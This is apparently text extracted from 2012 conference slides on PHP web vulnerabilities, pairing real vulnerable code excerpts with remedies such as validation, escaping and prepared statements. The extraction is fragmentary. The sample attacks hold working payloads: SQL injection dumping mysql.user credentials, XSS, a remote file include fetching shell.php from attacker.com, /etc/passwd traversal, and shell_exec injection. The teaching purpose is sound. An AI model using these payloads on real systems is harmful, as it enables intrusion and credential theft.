Académique Documents
Professionnel Documents
Culture Documents
Miroslav tampar
(dev@sqlmap.org)
Talk overview
Introduction to commonly exploited web application vulnerability classes (covering only those caused by coding mistake(s)) Usage of code review on real-life vulnerabilities as an educational tool Mitigation in form of remedies Note: While given examples will discuss PHP coding (due to its overwhelming popularity on the Web), the concepts also apply to any other web programming language
October 13th, 2012 2
Visits
31961 25960 25168 24166 22850 19074 17089 16211 16061 15991
Platform
php php php php php php php php php php
Date
2010-08-29 2012-01-25 2011-07-01 2011-07-21 2010-07-24 2011-05-23 2011-11-28 2011-08-09 2010-08-24 2011-08-03
Sample attack:
http://www.target.com/vuln.php?id=1 UNION ALL SELECT NULL,CONCAT(user,0x3a,password),NULL FROM mysql.user-October 13th, 2012 6
Sample attack:
http://www.target.com/vuln.php? name=<script>window.onload = function() {var link=document.getElementsByTagName("a");link[0].href ="http://www.attacker.com/";}</script>
October 13th, 2012 8
Sample attack:
http://www.target.com/vuln.php? page=http://www.attacker.com/shell.php?foo=
10
11
Sample attack:
GET /vuln.php HTTP/1.0 Cookie: template= ../../../../../../../../../etc/passwd
12
Sample attack:
http://www.target.com/vuln.php? tz=us;shell_exec($_GET['cmd']) http://www.target.com/prefs/timezone.php?cmd=cat /etc/passwd
October 13th, 2012 14
15
16
18
19
20
$page = new HtmlTemplate("templates/" . $config['tpl_name'] . "/index.html"); ... $page->SetParameter('UPCOMING_LINK', $config['site_url'].'upcoming.php?id='.$_GET['id']); $page->SetParameter('POPULAR_LINK', $config['site_url'].'index.php'); ... $page->CreatePageEcho($lang,$config);
21
(EDB-ID: 12593)
24
25
26
(EDB-ID: 10262)
header('Content-type: ' . $_REQUEST[type]); header('Content-Disposition: attachment; filename="' . $_REQUEST[filename] . '"'); readfile("./tmp/$ticketid" . "_" . $_REQUEST[filename]);
27
28
fwrite ($fd, '/* updated via install/index.php on ' . date ('r') . "\r\n"); foreach ($settings as $k => $v) { if ($v != '<br />' && $v != '') fwrite ($fd, $k . ': ' . $v . "\r\n"); }
29
Remedies (1)
Data validation
Process of ensuring that application is running with correct data Discard if it doesnt pass the validation process
if (!preg_match('/^\(?\d{3}\)?[-\s.]?\d{3}[-\s.]\d{4}$/', $phone)) { echo "Your phone number is invalid"; die(); }
31
Remedies (2)
Data sanitization
Removing any unwanted bits from the data and normalizing it to the correct form
$comment = strip_tags($_POST['comment']); ... $id = intval($_GET['id']); ... $username = preg_replace('/[^a-zA-Z0-9._]/', '', $_REQUEST['username']); ... $query = sprintf("SELECT * FROM users WHERE user='%s' AND password='%s'", mysql_real_escape_string($user), mysql_real_escape_string($password));
32
Remedies (3)
Output escaping
Protecting integrity of displayed data Prevents browser from applying any unintended meaning to any special sequence of characters that may be found Always escape output provided by users!
echo "You searched for: " . htmlspecialchars($_GET["query"], ENT_QUOTES);
33
Remedies (4)
Safe communication with a database
Prepared statements use one channel for commands and another one for data (which never allows commands)
$db = new PDO('dblib:host=localhost; dbname=testdb; charset=UTF-8', $user, $pass); $query = 'SELECT * FROM users WHERE id = :id'; $stmt = $db->prepare($query); $stmt->bindValue(':id', $_REQUEST['id']); $stmt->execute(); while($row = $stmt->fetch(PDO::FETCH_ASSOC)) { ...
October 13th, 2012 34
Questions?
35